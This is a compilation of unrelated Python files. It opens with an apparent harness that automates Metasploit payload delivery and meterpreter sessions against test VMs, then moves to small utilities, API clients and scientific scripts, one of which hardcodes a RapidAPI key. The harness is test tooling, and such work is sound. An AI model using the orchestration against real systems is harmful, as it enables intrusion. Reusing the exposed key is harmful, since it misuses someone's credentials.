host['VM_OBJECT'].makeDirOnGuest(host['PAYLOAD_DIRECTORY'])
sessionCounter = prepStagedScripts(testConfig, portNum)
timeoutSeconds = 200
if not finishAndLaunchStageOne(testConfig['MSF_HOSTS'], testConfig['HTTP_PORT'], testConfig['LOG_FILE']):
logMsg(testConfig['LOG_FILE'], "FAILED finishAndLaunchStageOne")
return False
if not waitForHttpServer(testConfig['MSF_HOSTS'], testConfig['LOG_FILE'], testConfig['HTTP_PORT']):
logMsg(testConfig['LOG_FILE'], "FAILED waitForHttpServer")
return False
if not waitForMsfPayloads(testConfig['MSF_HOSTS'], testConfig['REPORT_DIR'], testConfig['LOG_FILE'], timeoutSeconds):
logMsg(testConfig['LOG_FILE'], "FAILED waitForMsfPayloads")
return False
"""
STAGE TWO STUFF
"""
terminationToken = "!!! STAGE TWO COMPLETE !!!"
stageTwoResults = launchStageTwo(testConfig, terminationToken, 180)
if not stageTwoResults[0]:
logMsg(testConfig['LOG_FILE'], "FAILED launchStageTwo")
return False
else:
stageTwoNeeded = stageTwoResults[1]
stageThreeNeeded = stageTwoResults[1]
"""
IF WE LAUNCHED STAGE TWO, WAIT FOR THE SCRIPTS TO COMPLETE
"""
if stageTwoNeeded:
if not finishStageTwo(testConfig, terminationToken):
logMsg(testConfig['LOG_FILE'], "FAILED finishStageTwo")
return False
else:
logMsg(testConfig['LOG_FILE'], "NO STAGE TWO REQUIRED")
"""
MAKE STAGE THREE SCRIPT TO RUN BIND HANDLERS ON MSF HOSTS
"""
if stageThreeNeeded:
if not launchStageThree(testConfig):
logMsg(testConfig['LOG_FILE'], "FAILED launchStageThree")
return False
else:
logMsg(testConfig['LOG_FILE'], "WAITING FOR MSFCONSOLES TO LAUNCH...")
time.sleep(20)
else:
logMsg(testConfig['LOG_FILE'], "NO STAGE THREE SCRIPTS NEEDED")
"""
WAIT FOR THE METERPRETER SESSIONS TO FINISH....
"""
waitForMeterpreters(testConfig, sessionCounter)
"""
PULL STAGE THREE LOG FILES FROM MSF VMS
"""
if stageThreeNeeded:
for msfHost in testConfig['MSF_HOSTS']:
remoteFileName = msfHost['STAGE_THREE_LOGFILE']
localFileName = testConfig['REPORT_DIR'] + '/' + msfHost['NAME'] + "_stageThreeLog.txt"
msfHost['VM_OBJECT'].getFileFromGuest(remoteFileName, localFileName)
else:
logMsg(testConfig['LOG_FILE'], "NO STAGE THREE LOGFILES")
"""
PULL REPORT FILES FROM EACH TEST VM
"""
pullTargetLogs(testConfig)
logMsg(testConfig['LOG_FILE'], "FINISHED DOWNLOADING REPORTS")
"""
GET COMMIT VERSION, PCAPS, AND OTHER LOGS FROM MSF HOSTS
"""
pullMsfLogs(testConfig)
"""
CHECK TEST RESULTS
"""
testResult = checkData(testConfig)
"""
GENERATE HTML REPORT
"""
htmlReportString = makeHtmlReport(testConfig['TARGETS'], testConfig['MSF_HOSTS'])
htmlFileName = testConfig['REPORT_DIR'] + "/" + testConfig['REPORT_PREFIX'] + ".html"
try:
fileObj = open(htmlFileName, 'w')
fileObj.write(htmlReportString)
fileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "FAILED TO OPEN " + htmlFileName)
logMsg(testConfig['LOG_FILE'], "SYSTEM ERROR: \n" + str(e))
return testResult
def selectVms(vmList, posFilter=None):
menuVms = []
selectedVmList = []
for i in vmList:
if (posFilter == None) or (posFilter.upper() in i.vmIdentifier.upper()):
menuVms.append(i)
for i in range(len(menuVms)):
print(str(i) + " " + menuVms[i].vmIdentifier)
feedBack = raw_input(">> ")
print("SELECTION: " + feedBack +'\n')
feedbackList = feedBack.split(',')
for i in feedbackList:
selectedVmList.append(menuVms[int(i)])
return selectedVmList
def setupSessionData(testConfig):
for target in testConfig['TARGETS']:
logMsg(testConfig['LOG_FILE'], str(target))
if 'MODULES' not in target:
logMsg(testConfig['LOG_FILE'], "CONFIG FILE DID NOT HAVE MODULES LISTED FOR " + target['NAME'] + ". NOTHING TO TEST?")
return False
for module in target['MODULES']:
logMsg(testConfig['LOG_FILE'], str(module))
if 'exploit' in module['NAME'].lower():
for payload in target['PAYLOADS']:
logMsg(testConfig['LOG_FILE'], str(payload))
tempDic = {}
tempDic['MODULE'] = module.copy()
tempDic['PAYLOAD'] = payload.copy()
target['SESSION_DATASETS'].append(tempDic)
else:
tempDic = {}
tempDic['MODULE'] = module.copy()
target['SESSION_DATASETS'].append(tempDic)
return True
def setVmIPs(testConfig):
for host in testConfig['MSF_HOSTS'] + testConfig['TARGETS']:
if host['TYPE'].upper() == 'VIRTUAL' and 'IP_ADDRESS' not in host and 'VM_OBJECT' in host:
host['IP_ADDRESS'] = host['VM_OBJECT'].getVmIp()
if 'IP_ADDRESS' not in host:
return False
return True
def verifyConfig(jsonDic):
"""
CHECK MAIN LEVEL FOR REQUIRED DATA
"""
configPassed = True
requiredList = []
requiredList.append("FRAMEWORK_BRANCH")
requiredList.append("HTTP_PORT")
requiredList.append("STARTING_LISTENER")
requiredList.append("MSF_HOSTS")
requiredList.append("TARGETS")
requiredList.append("SUCCESS_LIST")
for item in requiredList:
if item not in jsonDic:
print("MISSING " + item + " IN CONFIGURATION FILE\n")
configPassed = False
if not configPassed:
return False
"""
MSF_HOSTS
"""
requiredMsfData = []
requiredMsfData.append("MSF_ARTIFACT_PATH")
requiredMsfData.append("TYPE")
requiredMsfData.append("METHOD")
requiredMsfData.append("NAME")
for requiredData in requiredMsfData:
for msfHost in jsonDic['MSF_HOSTS']:
if requiredData not in msfHost:
print("NO " + requiredData + " LISTED FOR MSF_HOST IN CONFIG FILE")
configPassed = False
if not configPassed:
return False
"""
SPECIFIC FOR TARGETS
"""
for target in jsonDic['TARGETS']:
requiredTargetData = []
requiredTargetData.append("TYPE")
requiredTargetData.append("NAME")
if target['METHOD'] == 'EXPLOIT':
requiredTargetData.append("NAME")
if target['TYPE'] != 'VIRTUAL':
requiredTargetData.append("IP_ADDRESS")
if target['METHOD'] == "VM_TOOLS":
requiredTargetData.append("USERNAME")
requiredTargetData.append("PASSWORD")
requiredTargetData.append("HYPERVISOR_CONFIG")
requiredTargetData.append("PAYLOAD_DIRECTORY")
for payload in jsonDic['PAYLOADS']:
if 'java' in payload['NAME'].lower():
hasJavaPayload = True
break
if 'python' in payload['NAME'].lower():
hasPythonPayload = True
break
if hasJavaPayload:
requiredTargetData.append("METERPRETER_JAVA")
if hasPythonPayload:
requiredTargetData.append("METERPRETER_PYTHON")
for requiredItem in requiredTargetData:
if requiredItem not in target:
print("NO " + requiredItem + " LISTED FOR " + target['NAME'] + " IN " + jsonDic)
configPassed = False
if not configPassed:
return False
return True
def waitForHttpServer(msfHosts, logFile, httpPort):
"""
WAIT FOR THE STAGE ONE SCRIPT TO FINISH....
THERE ARE TWO PARTS TO DETECT THE COMPLETION OF STAGE ONE SCRIPTS:
THE LAST INSTRUCTION IN THE STAGE ONE SCRIPT IS TO START AN HTTP SERVER TO PROVIDE PAYLOADS, SO WE WAIT UNTIL
THE HTTP PROCESS APPEARS. UNFORUNATELY, MSFCONSOLE TAKES SEVERAL SECONDS TO START. TO MAKE SURE WE DO NOT
LAUNCH THE REVERSE PAYLOADS BEFORE THE REVERSE HANDLERS ARE READY, THE REMOTE STAGE ONE SCRIPT HAS A FOR LOOP
WHERE IT DUMPS THE NETSTAT OUTPUT CONTAINING THE LISTENING PORT DATA TO A FILE. THIS SCRIPT PULLS THAT FILE
EVERY 5 SECONDS AFTER IT SEES THAT THE HTTP SERVER STARTED AND CHECKS TO SEE IF THE REVERSE LISTENERS HAVE STARTED.
ONCE THOSE LISTENERS HAVE STARTED, WE MOVE TO STAGE 2.
"""
"""
WAIT FOR HTTP SERVERS TO START ON MSF_VMs
"""
logMsg(logFile, "WAITING FOR STAGE ONE SCRIPT(S) TO COMPLETE...")
modCounter = 0
for host in msfHosts:
host['SCRIPT_COMPLETE'] = False
scriptComplete = False
while scriptComplete == False:
modCounter = modCounter + 1
try:
time.sleep(1)
except KeyboardInterrupt:
return False
scriptComplete = True
for host in msfHosts:
if host['SCRIPT_COMPLETE'] == False:
scriptComplete = False
if modCounter % 5 == 0:
logMsg(logFile, "WAITING FOR PYTHON HTTP SERVER TO START ON " + host['NAME'])
host['VM_OBJECT'].updateProcList()
for procEntry in host['VM_OBJECT'].procList:
if ('python' in procEntry.lower()) and (str(httpPort) in procEntry):
logMsg(logFile, "PYTHON HTTP SERVER FOUND ON " + host['NAME'])
logMsg(logFile, str(procEntry))
host['SCRIPT_COMPLETE'] = True
return True
def waitForMeterpreters(testConfig, sessionCounter, timeoutSec = 500):
modCounter = 0
previousCount = 0
currentCount = 0
staticCount = 0
finishedSpawning = False
try:
for i in range(timeoutSec):
if finishedSpawning and staticCount > 25:
break
previousCount = currentCount
currentCount = 0
for msfHost in testConfig['MSF_HOSTS']:
msfHost['VM_OBJECT'].updateProcList()
msfConsoleCount = 0
for procEntry in msfHost['VM_OBJECT'].procList:
if 'msfconsole' in procEntry:
msfConsoleCount = msfConsoleCount + 1
currentCount = currentCount + msfConsoleCount
if currentCount < previousCount:
finishedSpawning = True
if currentCount == previousCount:
logMsg(testConfig['LOG_FILE'], "NO CHANGE IN METERPRETER PROCESS COUNT [" + str(staticCount) +"]")
staticCount = staticCount + 1
else:
staticCount = 0
time.sleep(1)
if modCounter % 10 == 0:
logMsg(testConfig['LOG_FILE'], str(msfConsoleCount) + " msfconsole PROCESSES STILL RUNNING ON " + msfHost['NAME'])
except KeyboardInterrupt:
print("CAUGHT KEYBOARD INTERRUPT; SKIPPING THE NORMAL WAIT BUT PROCESSING THE DATA AND REVERTING VMS")
return None
def waitForMsfPayloads(msfHosts, reportDir, logFile, timeoutSec = 300):
"""
HTTP SERVERS HAVE STARTED; CHECK NETSTAT LOGS TO ENSURE ALL REQUIRED PORTS ARE LISTENING
"""
for waitCycles in range(timeoutSec/5):
stageTwoComplete = True
try:
logMsg(logFile, "CHECKING netstat OUTPUT")
for host in msfHosts:
remoteFile = host['MSF_PAYLOAD_PATH'] + "/netstat.txt"
hostReady = True
if 0 == len(host['LISTEN_PORTS']):
logMsg(logFile, "NO PORTS REQUIRED FOR " + host['NAME'] + "\n")
host['READY'] = True
if 'READY' in host and host['READY'] == True:
logMsg(logFile, "ALL REQUIRED PORTS READY ON " + host['NAME'] + "\n")
else:
logMsg(logFile, "PORT " + str(host['LISTEN_PORTS']) + " SHOULD BE OPEN ON " + host['NAME'] + "\n")
localFile = reportDir + "/" + host['NAME'] + "_netstat_" + str(waitCycles) + ".txt"
host['VM_OBJECT'].getFileFromGuest(remoteFile, localFile)
try:
netstatFile = open(localFile, 'r')
netstatData = netstatFile.read()
netstatFile.close()
except Exception as e:
logMsg(logFile, "FAILED READING NETSTAT FILE: " + localFile + "\n" + str(e))
# IF WE DID NOT GET A FILE, WE CANNOT SAY THAT THE PORTS ARE READY
netstatData = ""
pass
for port in host['LISTEN_PORTS']:
if str(port) not in netstatData:
hostReady = False
logMsg(logFile, "PORT " + str(port) + " NOT OPEN ON " + host['NAME'] + "\n")
else:
logMsg(logFile, "PORT " + str(port) + " IS OPEN ON " + host['NAME'] + "\n")
if hostReady == False:
stageTwoComplete = False
else:
host['READY'] = True
if stageTwoComplete == True:
break;
time.sleep(5)
except KeyboardInterrupt:
print("CAUGHT KEYBOARD INTERRUPT; ABORTING TEST AND RESETTING VMS....")
return False
waitCycles = 3
for i in range(waitCycles):
logMsg(logFile, "SLEEPING FOR " + str((waitCycles-i)*10) + " SECONDS")
try:
time.sleep(5)
except KeyboardInterrupt:
print("CAUGHT KEYBOARD INTERRUPT; ABORTING TEST AND RESETTING VMS....")
return False
return True
def waitForVms(vmList):
"""
WAIT FOR THE VMS TO BE READY.
THIS RELIES ON VMWARE_TOOLS TO BE INSTALLED AND RUNNING.
"""
for vmObject in vmList:
if vmObject.waitForVmToBoot() == False:
return False
return True
|
from django.db import models
class ArticleManager(models.Manager):
pass
|
import socket, json, requests
from lxml import etree
# ATAK CoT proxy for CloudRF API
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# EDIT ME: Radio templates are read from local JSON files and mapped to ATAK callsigns here
radios = {"CloudRF": "radios/bigradio.json", "droneyMcDroneFace": "radios/drone.json"}
def parseCoT(xml):
root = etree.fromstring(xml.encode("utf-8"))
lat=round(float(root.xpath("//event/point")[0].attrib["lat"]),5)
lon=round(float(root.xpath("//event/point")[0].attrib["lon"]),5)
cs=root.xpath("//event/detail/contact")[0].attrib["callsign"]
return {"cs": cs, "lat": lat, "lon": lon}
def areaAPI(update):
if update["cs"] not in radios: # Warn if user didn't setup radios {}
print("Callsign %s does not have a radio allocated!" % update["cs"])
else:
print("\nCalculating coverage for c/s %s at %.5f,%.5f using %s..." % (update["cs"],update["lat"],update["lon"],radios[update["cs"]]))
with open(radios[update["cs"]]) as json_file:
radio = json.load(json_file)
radio["lat"] = update["lat"] # Use loc from CoT message..
radio["lon"] = update["lon"]
print(radio)
r = requests.post("https://cloudrf.com/API/area?atak", data=radio) # DO IT
print("\nAPI RESPONSE:\n"+r.text)
j = json.loads(r.text)
if 'kmz' in j:
r = requests.get("https://cloudrf.com/API/archive/data?callsign="+str(update["cs"])+"&atak="+str(j["id"])+"&uid="+str(radio["uid"])+"&key="+radio["key"]) # ATAK fairy
print(r.text)
s.bind(('', 8099)) # Default TAK server port
s.listen(1)
conn, addr = s.accept()
while 1:
data = conn.recv(1024)
conn.sendall(data) # Heartbeat expects a copy of the data
try:
if "contact" in data.decode("utf-8"):
update = parseCoT(data.decode("utf-8")) # Callsign, lat, lon..
areaAPI(update)
else:
print(data)
except Exception as e:
print(e)
pass
conn.close()
|
from random import choice
len_of_pass = 16
chars = "abcdefghijklmnopqrstvuwxyz1234567890!@#$%^&*()_+><>~ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# password = []
# for each_char in range(len_of_pass):
# password.append(choice(chars))
# print("Your random password is :" ,"".join(password))
random_pass = "".join(choice(chars) for each in range(len_of_pass))
print("Your random password is : "+random_pass) |
import socket
import time
"""
Simula la bateria fisica, mediante socket
"""
while True:
try:
cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
direccion_servidor = ("localhost", 11000)
cliente.connect(direccion_servidor)
carga = input("Carga > ")
cliente.send(bytes(carga.encode()))
cliente.close()
except ConnectionError:
print("Intentar de vuelta")
time.sleep(2)
|
from weibo import APIClient
import urllib
import webbrowser #for test
import httplib
import weiboconfig as config
#get the pin code from the redirect_uri
def get_pincode():
client = APIClient(app_key=config.APP_KEY, app_secret=config.APP_SECRET, redirect_uri=config.CALLBACK_URI)
url = client.get_authorize_url()
conn = httplib.HTTPSConnection('api.weibo.com')
postdata = urllib.urlencode({'client_id':config.APP_KEY,'response_type':'code','redirect_uri':config.CALLBACK_URI, \
'action':'submit','userId':config.ACCOUNT,'passwd':config.PASSWORD,'isLoginSina':0,'from':'','regCallback':'', \
'state':'','ticket':'','withOfficalFlag':0})
conn.request('POST','/oauth2/authorize',postdata,{'Referer':url, 'Content-Type':'application/x-www-form-urlencoded'})
res = conn.getresponse()
location = res.getheader('location')
try:
code = location.split('=')[1]
return code
except:
print "error"
if __name__ == "__main__":
print get_pincode()
|
from machine import Pin
import time
D4 = Pin(2, Pin.OUT)
while(True):
D4.off()
time.sleep(2)
D4.on()
time.sleep(2) |
import requests, json
from pprint import pprint
url_netflix = "https://netflix-unofficial.p.rapidapi.com/api/search"
headers_netflix = {
'x-rapidapi-host': "netflix-unofficial.p.rapidapi.com",
'x-rapidapi-key': "df04cb6865msha77f6ca500b312ep1202bcjsn9a883a67fa18"
}
response_netflix = requests.request("GET", url_netflix, headers=headers_netflix)
data_netflix = response_netflix.json()
print(data_netflix)
|
from pyicloud import PyiCloudService
import os, math
from datetime import datetime, timedelta
ICLOUD_MAIL = os.environ['ICLOUD_MAIL']
ICLOUD_PSWD = os.environ['ICLOUD_PSWD']
class ICalendar(object):
def __init__(self):
self.api = PyiCloudService(ICLOUD_MAIL, ICLOUD_PSWD)
self.api.calendar.refresh_client()
self.events = None
self.setup_calendar(datetime.now(), datetime.now() + timedelta(days=30))
def setup_calendar(self, date_from, date_to):
events = {}
for event in self.api.calendar.events(date_from, date_to):
title = event['title']
location = event['location']
# Date
date = "%s-%s-%s" % (str(event['startDate'][0])[0:4], str(event['startDate'][0])[4:6], str(event['startDate'][0])[6:8])
# Start time
hour = str(event['startDate'][4])
hour = "0" + hour if len(hour)==1 else hour
minute = str(event['startDate'][5])
minute = "0" + minute if len(minute)==1 else minute
begin = "%s:%s" % (hour, minute)
# End time
hour = str(event['endDate'][4])
hour = "0" + hour if len(hour)==1 else hour
minute = str(event['endDate'][5])
minute = "0" + minute if len(minute)==1 else minute
end = "%s:%s" % (hour, minute)
# duration
duration = event['duration']
# Add to events
if not date in events:
events[date] = []
events[date].append({'title':title, 'date': date, 'location':location, 'begin':begin, 'end':end, 'duration': duration})
self.events = events
def get_events(self, date):
event_list = None
if date in self.events:
event_list = sorted(self.events[date], key=lambda k: k['begin'])
return event_list
def get_next_event(self):
event = None
for i in range(31):
day = str(datetime.now() + timedelta(days=i)).split(" ")[0]
events = self.get_events(day)
if events:
event = events[0]
break
return event
|
from .delboeuf_image import _delboeuf_image
from .delboeuf_parameters import _delboeuf_parameters
from .delboeuf_psychopy import _delboeuf_psychopy
class Delboeuf:
"""
A class to generate the Delboeuf Illusion.
The Delboeuf illusion is an optical illusion of relative size perception,
where circles of identical size appear as different because of their surrounding context.
Specifically, the circle that is closely surrounded by a ring appears larger than the circle surrounded by a distant ring.
Each instance of Delboeuf contains attributes corresponding to the parameters of the illusion.
Parameters
----------
illusion_strength : float
The strength of the surrounding context, i.e. outer circles, in biasing perception of unequally sized inner circles.
Specifically, the size of the outer circle relative to the inner circle (in percentage, e.g, if illusion_strength=1,
it means that the outer circle will be 100% bigger, i.e., 2 times bigger than the inner circle).
A negative sign means that the illusion will enhance the perception of the actual difference in circle sizes
whereas a positive sign reduces this perception.
difference : float
The objective size difference of the inner circles.
Specifically, the size of left inner circle relative to the right (in percentage, e.g., if difference=1,
it means that the left inner circle will be 100% bigger, i.e., 2 times bigger than the right).
A negative sign would make the left inner circle smaller than the right inner circle.
size_min : float
Size of smaller inner circle. Defaults to 0.25.
distance : float
Distance between circles. Defaults to 1.
distance_auto : bool
If true, distance is between edges (fixed spacing), if false (default), between centers (fixed location).
"""
def __init__(
self, illusion_strength=0, difference=0, size_min=0.25, distance=1, distance_auto=False
):
"""
Compute attributes for the Delboeuf Illusion.
Parameters
----------
illusion_strength : float
The strength of the surrounding context, i.e. outer circles, in biasing perception of unequally sized inner circles.
Specifically, the size of the outer circle relative to the inner circle (in percentage, e.g, if illusion_strength=1,
it means that the outer circle will be 100% bigger, i.e., 2 times bigger than the inner circle).
A negative sign means that the illusion will enhance the perception of the actual difference in circle sizes
whereas a positive sign reduces this perception.
difference : float
The objective size difference of the inner circles.
Specifically, the size of left inner circle relative to the right (in percentage, e.g., if difference=1,
it means that the left inner circle will be 100% bigger, i.e., 2 times bigger than the right).
A negative sign would make the left inner circle smaller than the right inner circle.
size_min : float
Size of smaller inner circle. Defaults to 0.25.
distance : float
Distance between circles. Defaults to 1.
distance_auto : bool
If true, distance is between edges (fixed spacing), if false (default), between centers (fixed location).
"""
self.parameters = _delboeuf_parameters(
illusion_strength=illusion_strength,
difference=difference,
size_min=size_min,
distance=distance,
distance_auto=distance_auto,
)
def get_parameters(self):
"""
Returns a dictionary of parameters passed into the Delboeuf illusion.
Returns
--------
dict
A dictionary of all parameters passed into the Delboeuf illusion, including:
- **Difference** : Objective difference in the target features, by modifying `difference` of delboeuf_parameters()
- **Illusion** : Name of the illusion, Delboeuf.
- **Illusion_Strength** : The strength of the surrounding context in biasing illusion, by modifying `illusion_strength` of delboeuf_parameters().
- **Illusion_Type** : `Congruent` if the illusion enhances the perception of the objective difference in the illusion, and `Incongruent` if it reduces the perceived difference.
- **Size_Inner_Left** : Size of the inner left circle.
- **Size_Inner_Right** : Size of the inner right circle.
- **Sine_Inner_Difference** : Difference in areas of the left and right inner circles.
- **Size_Outer_Left** : Size of the outer left rim.
- **Size_Outer_Right** : Size of the outer right rim.
- **Distance** : Distance between the circles, by modifying `distance` of delboeuf_parameters().
- **Distance_Reference** : Distance between circles is computed 'Between Edges' or `Between Centers`, by modifying distance_auto of delboeuf_parameters().
- **Distance_Edges_Inner** : Distance between the edges of the inner left and right circles.
- **Distance_Edges_Outer** : Distance between the edges of the outer left and right rims.
- **Size_Inner_Smaller** : Size of the smaller inner circle, equates to size_min of delboeuf_parameters().
- **Size_Inner_Larger** : Size of the larger inner circle.
- **Size_Outer_Smaller** : Size of the smaller outer rim.
- **Size_Outer_Larger** : Size of the larger outer rim.
- **Position_Left** : Position of the left circle.
- **Position_Right** : Position of the right circle.
"""
return self.parameters
def to_dict(self):
"""
Alias for `get_parameters()`.
"""
return self.get_parameters()
def to_image(self, width=800, height=600, outline=10, background="white", **kwargs):
"""Create a PIL image of the Delboeuf illusion.
Parameters
----------
width : int
Width of the returned image.
height : int
Height of the returned image.
outline : float
The width of the outline of the circles in the illusion, passed into `image_circle()`.
background : str
Color of the background.
**kwargs
Additional arguments passed into `delboeuf_parameters()`.
Returns
-------
Image
Image of the Delboeuf illusion, defaults to 800 x 600 pixels.
Can be resized
(`resize()`, See https://pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.Image.resize)
and saved in different file formats
(`save()` See https://pillow.readthedocs.io/en/stable/handbook/image-file-formats.html).
Examples
---------
>>> import pyllusion
>>>
>>> delboeuf = pyllusion.Delboeuf(illusion_strength=3)
>>> delboeuf.to_image()
"""
img = _delboeuf_image(
parameters=self.parameters,
width=width,
height=height,
outline=outline,
background=background,
**kwargs
)
return img
def to_psychopy(self, window, **kwargs):
"""Create a PsychoPy stimulus of the Delboeuf illusion.
Parameters
----------
window : object
The window object initiated by `psychopy.visual.Window` in which the stimulus will be rendered.
**kwargs
Additional arguments passed into `delboeuf_parameters()`.
Returns
-------
In-place modification of the PsychoPy window (No explicit return).
Examples
---------
>>> import pyllusion
>>> from psychopy import visual, event
>>> # Create parameters
>>> delboeuf = pyllusion.Delboeuf(difference=2, illusion_strength=3)
>>> # Initiate Window
>>> window = visual.Window(size=[800, 600], winType='pygame', color='white')
>>> # Display illusion
>>> delboeuf.to_psychopy(window)
>>> # Refresh and close window
>>> window.flip()
>>> event.waitKeys() # Press any key to close
>>> window.close()
"""
_delboeuf_psychopy(window, self.parameters, **kwargs)
|
import numpy as np
import h5py
import pcl
dataset = np.zeros(shape=(32,2048,3))
labels = np.zeros(shape=(32,1))
'''for i in range(0,10):
x = pcl.io.loadpcd("unidentified_"+str(i)+".pcd")
z = x.xyz
offset=2048-z.shape[0]
x = np.zeros((offset,3))
dataset2 = np.append(z,x,0)
dataset[i]=dataset2
labels[i]=0'''
for i in range(0,16):
x = pcl.io.loadpcd("car_"+str(i)+".pcd")
z = x.xyz
offset=2048-z.shape[0]
x = np.zeros((offset,3))
dataset2 = np.append(z,x,0)
dataset[i]=dataset2
labels[i]=0
for i in range(0,16):
x = pcl.io.loadpcd("wall_"+str(i)+".pcd")
z = x.xyz
offset=2048-z.shape[0]
x = np.zeros((offset,3))
dataset2 = np.append(z,x,0)
dataset[i+16]=dataset2
labels[i+16]=1
hf = h5py.File('data.h5','w')
hf.create_dataset('data',data=dataset)
hf.create_dataset('label',data=labels)
hf.close()
|
# Generated by Django 3.2.5 on 2021-08-07 13:00
import colorfield.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('works', '0005_auto_20210807_1256'),
]
operations = [
migrations.CreateModel(
name='ExcerptFontColor',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', colorfield.fields.ColorField(default='#FFFFFF', max_length=18, verbose_name='hexa')),
],
options={
'verbose_name_plural': 'Excerpt Font Colors',
},
),
migrations.CreateModel(
name='ExcerptFontSize',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.CharField(max_length=3)),
],
options={
'verbose_name_plural': 'Excerpt Font Sizes',
},
),
]
|
import fitsio
import os
import numpy as np
from scipy.stats import invgamma, dirichlet, multivariate_normal, norm
import urllib
import random
# Bayesian model selection scheme
#
# Let's say we have model M. Then, the model evidence is:
# P(M | D) \propto P(D | M) P(M)
# Typically, we will assume P(M) is uniform across the finite number of models.
# P(D | M) is called the marginal likelihood and is:
# \int P(D | M, theta) P(theta | M) dtheta
# We use importance simulated annealing
TRIALS = 10000
def uniform_logpdf(x, start, end):
if x < start or x > end:
return -np.inf
return -np.log(end - start)
# weights, means, scales
COV_ALPHA = 5
# define uniform interval
START = 0
END = 10000
A = 1
LOC = 10
SCALE = 10
components = 10
def simple_model_sample_prior():
vals = np.zeros(3 * components)
vals[:components] = \
np.exp(multivariate_normal.rvs(cov=COV_ALPHA*np.eye(components)))
for i in range(components, 2*components):
vals[i] = random.random() * (END - START) + START
vals[(2*components):(3*components)] = \
invgamma.rvs(A, LOC, SCALE, size=components)
return vals
def simple_model_prior_logpdf(values):
means = np.sum([uniform_logpdf(val, START, END) for val in values[components:(2*components)]])
scales = np.sum([invgamma.logpdf(val, A, LOC, SCALE) for val in values[(2*components):(3*components)]])
weights = multivariate_normal.logpdf(values[:components],
mean=np.zeros(components),
cov=COV_ALPHA*np.eye(components))
return weights + means + scales
def simple_model_posterior_logpdf(values, data):
prob = 1
for datum in data:
lambdas = datum['lam']
spec = datum['flux']
ivar = datum['ivar']
for i in range(len(lambdas)):
if ivar[i] != 0:
pred = 0
for n in range(components):
weight = values[n]
mean = values[components + n]
scale = values[2 * components + n]
pred += np.exp(-(lambdas[i] - mean)**2 / scale) * weight
prob += norm.logpdf(spec[i], pred, 1 / np.sqrt(ivar[i]))
return prob + simple_model_prior_logpdf(values)
MEAN_VAR = 10
VAR_VAR = 10
WEIGHT_VAR = 1
def propose(values, log_likelihood):
trials = 1
curr_values = np.copy(values)
for i in range(trials):
# propose weights
log_weights = np.log(values[:components])
new_log_weights = multivariate_normal.rvs(mean=log_weights, cov=np.eye(components)*WEIGHT_VAR)
# convert from softmax
new_weights = np.exp(new_log_weights)
# propose means
means = values[components:(2*components)]
new_means = multivariate_normal.rvs(mean=means, cov=np.eye(components)*MEAN_VAR)
# propose variances
variances = values[(2*components):(3*components)]
new_vars = multivariate_normal.rvs(mean=variances, cov=np.eye(components)*VAR_VAR)
new_value = np.append(new_weights, np.append(new_means, new_vars))
try:
prob_new = log_likelihood(new_value)
prob_old = log_likelihood(values)
except:
continue
if prob_new == -np.inf or prob_old == -np.inf:
continue
if np.all(means >= 0) and np.all(variances >= 0) and \
(prob_new > prob_old or random.random() < np.exp(prob_new - prob_old)):
curr_values = np.copy(new_value)
return curr_values
# define betas
# define steps in simulated annealing
# proposal variance
# dimensions
betas = np.append(np.linspace(0,0.1,num=10), np.linspace(0.1,1,num=10))
def get_intermediate(prior, posterior, x, data, beta):
return prior_pdf(x)**(1 - beta) * posterior_pdf(x, data)**beta
def simulated_annealing(sample_prior, prior_pdf, posterior_pdf, propose, data):
sum_weights = 0
weighted_sum = 0
log_weights = np.array([])
log_posteriors = np.array([])
for i in range(TRIALS):
values = np.zeros((len(betas), 3 * components))
likelihoods = np.zeros(TRIALS)
# sample from prior
values[0,:] = sample_prior()
for j in range(1, len(betas)):
# Metropolis step
#print values[j-1][0]
values[j,:] = \
propose(values[j-1,:],
lambda x:(prior_pdf(x)*(1 - betas[j]) + posterior_pdf(x, data)*betas[j]))
log_weight = 0
for j in range(1, len(betas)):
log_weight += \
prior_pdf(values[j,:])*(betas[j-1] - betas[j]) + \
posterior_pdf(values[j,:], data)*(betas[j] - betas[j-1])
log_weights = np.append(log_weights, log_weight)
log_posteriors = np.append(log_posteriors,
posterior_pdf(values[len(betas)-1,:], data))
log_weights_sub = log_weights - np.max(log_weights)
#print log_weights_sub
weights = np.exp(log_weights_sub)
weights /= np.sum(weights)
est = np.dot(weights, np.exp(log_posteriors))
print "marginal likelihood for iteration %d: %g" % (i, est)
return est
#
# Constructs a path to the spec file online given plate, mjd, fiber -
# which is information about the spec instrument/run
#
def spec_url(plate, mjd, fiber):
spec_url_template = os.path.join(
"http://data.sdss3.org/sas/dr12/boss/spectro/",
"redux/v5_7_0/spectra/%04d/spec-%04d-%05d-%04d.fits"
)
return spec_url_template%(plate, plate, mjd, fiber)
if __name__=="__main__":
# load source file - has information about spec collection
df = fitsio.FITS('PhotoSpecBoss_andrewcmiller.fit')
sources = df[1].read()
# easily identify which objects are which
gal_idx = sources['class'] == "GALAXY"
qso_idx = sources['class'] == "QSO"
str_idx = sources['class'] == "STAR"
print "%d galaxies"%sum(gal_idx)
# grab the URL for the first star
s = sources[str_idx][0]
first_star = spec_url(s['plate'], s['mjd'], s['fiberID'])
print first_star
f = urllib.urlopen(first_star)
out = open('spec.fits', 'wb')
out.write(f.read())
out.close()
df = fitsio.FITS('spec.fits')
spec_info = {}
spec_info['lam'] = np.power(10., df[1]['loglam'].read())
spec_info['flux'] = df[1]['flux'].read()
spec_info['ivar'] = df[1]['ivar'].read()
print spec_info
# get actual spectrum
simulated_annealing(simple_model_sample_prior,
simple_model_prior_logpdf,
simple_model_posterior_logpdf,
propose,
[spec_info])
|
"""
文件缓冲区的处理
f.write() :将字符串写到缓冲区
f.close() :将缓冲区的内容写入文件,并且将缓冲区清空,同时关闭文件
f.flush() :将缓冲区的内容写入文件,但是不清空缓冲区内容
f.read() :将内容读取到缓冲区
time.sleep(10):文件对象暂停10秒再进行之后的操作
"""
import time
f = open("D:/test/缓冲区处理.txt","w+")
